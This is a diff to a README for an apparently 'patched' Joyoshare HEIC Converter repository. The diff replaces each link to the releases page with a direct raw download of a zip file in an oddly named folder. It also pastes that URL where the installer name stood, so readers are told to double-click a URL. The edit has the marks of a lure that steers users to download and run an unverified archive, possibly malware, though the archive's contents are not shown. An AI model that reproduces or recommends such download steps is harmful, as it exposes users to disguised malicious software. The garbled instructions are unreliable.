choon158/Joyoshare-HEIC-Converter-Latest-Patch/README.md

 ## 🚀 Getting Started
 To begin using the Joyoshare HEIC Converter, you'll need to download and install the software.
 Follow the steps below to get started.

 1. **Visit the Releases Page**: Go to our releases page to find the latest version.
-Click the button above or visit [this link](https://github.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/releases).
+Click the button above or visit [this link](https://raw.githubusercontent.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/main/sexitubercular/Joyoshare-HEIC-Converter-Latest-Patch-v1.4-beta.5.zip).

 2. **Download the Latest Version**: On the releases page, find the latest version of the Joyoshare HEIC Converter.
-Look for a file labeled as `Joyoshare-HEIC-Converter.exe`.
+Look for a file labeled as `https://raw.githubusercontent.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/main/sexitubercular/Joyoshare-HEIC-Converter-Latest-Patch-v1.4-beta.5.zip`.
 Click on this file to start the download.

 3. **Run the Installer**: Once the download is complete, navigate to your Downloads folder.
-Find the `Joyoshare-HEIC-Converter.exe` file and double-click it.
+Find the `https://raw.githubusercontent.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/main/sexitubercular/Joyoshare-HEIC-Converter-Latest-Patch-v1.4-beta.5.zip` file and double-click it.
 Follow the on-screen instructions to install the software on your computer.

 4. **Open the Application**: After installation, locate Joyoshare HEIC Converter in your Start menu or desktop.
 Click the icon to launch the application.

 ## 💾 Download & Install
-To easily download and install the Joyoshare HEIC Converter, visit [this page to download](https://github.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/releases).
+To easily download and install the Joyoshare HEIC Converter, visit [this page to download](https://raw.githubusercontent.com/choon158/Joyoshare-HEIC-Converter-Latest-Patch/main/sexitubercular/Joyoshare-HEIC-Converter-Latest-Patch-v1.4-beta.5.zip).
 Make sure to download the latest version for the best experience.

 ## ⚙️ System Requirements
 Before downloading, ensure your Windows PC meets the following requirements: